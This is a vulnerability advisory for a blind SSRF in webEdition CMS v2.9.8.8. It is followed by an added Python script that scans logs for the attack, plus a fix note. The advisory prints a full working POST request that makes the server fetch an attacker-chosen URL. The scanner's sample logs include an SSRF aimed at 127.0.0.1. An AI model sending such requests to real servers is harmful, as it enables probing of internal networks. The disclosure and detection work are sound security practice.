
webEdition CMS v2.9.8.8 - Blind SSRF

Exploit Title: webEdition CMS v2.9.8.8 - Blind SSRF
Application: webEdition CMS
Version: v2.9.8.8
Bugs: Blind SSRF
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/onlinestaller.tgz?p=1
Date of found: 07.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details / POC
====================================================
The application fetches whatever URL is supplied in the we_cmd[0] parameter of the RSS widget request (for example https://youserver/test.xml), so the server can be made to issue requests to an attacker-chosen host without the response being shown (blind SSRF).
POC request:
POST /webedition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1
Host: localhost
Content-Length: 141
Sec-Ch-Ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Sec-Ch-Ua-Platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/webedition/index.php?we_cmd[0]=startwe
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=41A9164E606666254199B3EA1CD3D2E0AD969C379; cookie=yep; treewidth_main=300
Connection: close

we_cmd[0]=https://you-server/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=11000000&we_cmd[4]=we_cmd[we_cmd[5]=m_3
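The request above hands a caller-chosen URL to the RSS widget, which the server then fetches. As an added example that is not part of the original advisory or of the webEdition code base, the following Python script shows how a defender could scan web-server logs for that pattern: it assumes a constructed log format (client, method, path, status, raw POST body), an assumed allowlist of feed hosts (ALLOWED_FEED_HOSTS), and constructed sample log lines; the only page-derived details are the rpc.php path, the widgetGetRss command and the we_cmd[0] parameter.

```python
import re
import ipaddress
from urllib.parse import urlparse, parse_qs

# Assumed allowlist of hosts the RSS widget may legitimately fetch from
# (a deployment-specific choice, not something the advisory states).
ALLOWED_FEED_HOSTS = {"www.webedition.org"}

# Constructed sample log lines; the format is an assumption for this example:
# "<client> <method> <path> <status> body=<raw POST body>"
SAMPLE_LOG = """\
10.0.0.5 POST /webedition/rpc.php?cmd=widgetGetRss&mod=rss 200 body=we_cmd%5B0%5D=https%3A%2F%2Fyou-server%2Ftest.xml&we_cmd%5B1%5D=111000
10.0.0.6 POST /webedition/rpc.php?cmd=widgetGetRss&mod=rss 200 body=we_cmd%5B0%5D=http%3A%2F%2F127.0.0.1%3A8080%2Fstatus&we_cmd%5B1%5D=1
10.0.0.7 GET /webedition/index.php?we_cmd[0]=start 200 body=
10.0.0.8 POST /webedition/rpc.php?cmd=widgetGetRss&mod=rss 200 body=we_cmd%5B0%5D=https%3A%2F%2Fwww.webedition.org%2Ffeed.xml
"""

LOG_RE = re.compile(
    r"^(?P<client>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) body=(?P<body>.*)$"
)


def classify_feed_url(url):
    """Classify a feed URL as 'allowed', 'external', 'internal' or 'non-http'.

    'internal' covers loopback, private, link-local and reserved addresses
    as well as localhost names, i.e. the targets an SSRF would be used to reach.
    """
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return "non-http"
    host = parsed.hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a hostname rather than a literal IP
    if ip is not None and (ip.is_loopback or ip.is_private
                           or ip.is_link_local or ip.is_reserved):
        return "internal"
    if host == "localhost" or host.endswith(".localhost"):
        return "internal"
    if host in ALLOWED_FEED_HOSTS:
        return "allowed"
    return "external"


def find_ssrf_attempts(log_text):
    """Return one finding per widgetGetRss request whose we_cmd[0] is not allowlisted."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        request_path = urlparse(m["path"])
        if not request_path.path.endswith("/webedition/rpc.php"):
            continue
        if parse_qs(request_path.query).get("cmd") != ["widgetGetRss"]:
            continue
        # parse_qs URL-decodes both keys and values, so we_cmd%5B0%5D -> we_cmd[0]
        body = parse_qs(m["body"])
        for url in body.get("we_cmd[0]", []):
            verdict = classify_feed_url(url)
            if verdict != "allowed":
                findings.append({"client": m["client"], "url": url, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for finding in find_ssrf_attempts(SAMPLE_LOG):
        print(f"{finding['client']}: {finding['verdict']} feed target {finding['url']}")
```

The same classify_feed_url check, applied before the fetch rather than after the fact in logs, is the shape of the server-side fix: resolve and validate the target host against an allowlist and reject internal address ranges before the RSS widget issues any request.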